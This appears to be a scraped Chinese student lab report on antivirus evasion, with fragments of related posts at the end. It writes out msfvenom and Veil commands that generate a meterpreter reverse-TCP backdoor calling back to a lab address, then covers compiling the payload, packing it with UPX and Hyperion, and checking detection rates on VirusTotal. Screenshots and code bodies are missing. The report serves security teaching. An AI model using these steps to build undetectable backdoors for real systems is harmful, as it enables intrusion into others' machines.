20175201張馳exp3 免殺原理與實踐

2022-08-14 07:51:09 字數 2350 閱讀 5534

目錄

三、實驗遇到的問題

四、實驗感想

之後我們可以通過virustotal或virscan這兩個**進行檢測,看看能被多少殺軟檢測出來。

檢出率是26/49

測試一下能不能免殺:

同樣測試一下能不能免殺:

檢出率3/66

我們首先使用sudo apt-get update命令和sudo apt-get upgrade命令進行更新

sudo apt-get install veil命令安裝veil

之後使用veil命令開啟veil,輸入y繼續安裝直至完成(過程十分漫長,十分艱難。。

我終於成功了...

輸入use evasion,進入veil-evasion

輸入list,可檢視可生成檔案的格式

輸入命令use c/meterpreter/rev_tcp.py進入配置介面

依次輸入set lhost 192.168.80.130set lport 5201設定**連線ip和埠

輸入generate生成檔案

然後我們用virus total來檢測一下,看看有多少殺軟能檢測出來

檢出率10/49效果其實還不錯了

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.130 lport=5201 -f c生成一段shellcode

然後我們用vim命令建立乙個檔案20175201.c,然後將unsigned char buf賦值到其中,內容如下:

使用命令i686-w64-mingw32-g++ 20175201.c -o 20175201.exe編譯這個.c檔案為可執行檔案

通過virustotal檢測結果如下:

給之前的20175201.exe加個殼得到20175201_upx.exe:

virus totals檢測結果:

加密殼(hyperion)

通過virus totals:

(3)通過組合應用各種技術實現惡意**免殺

我們可以使用msfvenom -l encoders檢視可以使用的編碼器來生成不同的後門

使用之前的veil,c/meterpreter/rev_tcp.py生成的exe可執行檔案加upx壓縮殼;然後在kali上監聽並回連

git clone 

cd veil/config/

./setup.sh

Exp3 免殺原理與實踐

實驗做到中間的時候,在利用virustotal和virscan兩個平台上檢測時看到確實有不少殺軟做的不怎麼樣。實驗做到最後,發現確實我們對一些軟體進行加殼處理後殺軟也沒殺出來。分析殺軟檢測和免殺原理的時候確實感覺有種魔高一尺道高一丈的感覺 雖然這樣用詞不太準確 真正感覺到我們網路空間的安全性對於一般...

20155202張旭 Exp3 免殺原理與實踐

改變特徵碼 改變行為方式 改變行為 非常規方法免殺是做什麼?免殺的基本方法有哪些?1.msfvenom使用編碼器 編碼後呢,按理論上講,編碼會降低檢出率,大不了多編碼幾次,總會檢不出來。一次編碼 msfvenom p windows meterpreter reverse tcp e x86 shi...

20175201張馳 實驗三 敏捷開發與XP實踐

實驗步驟 一 敏捷開發與xp 一.敏捷開發與xp實踐 1 實驗要求 敏捷開發與xp實踐 eclipse的內容替換成idea 參考 安裝alibaba 外掛程式,解決 中的規範問題。在idea中使用工具 code reformate code 把下面 重新格式化,再研究一下code選單,找出一項讓自己...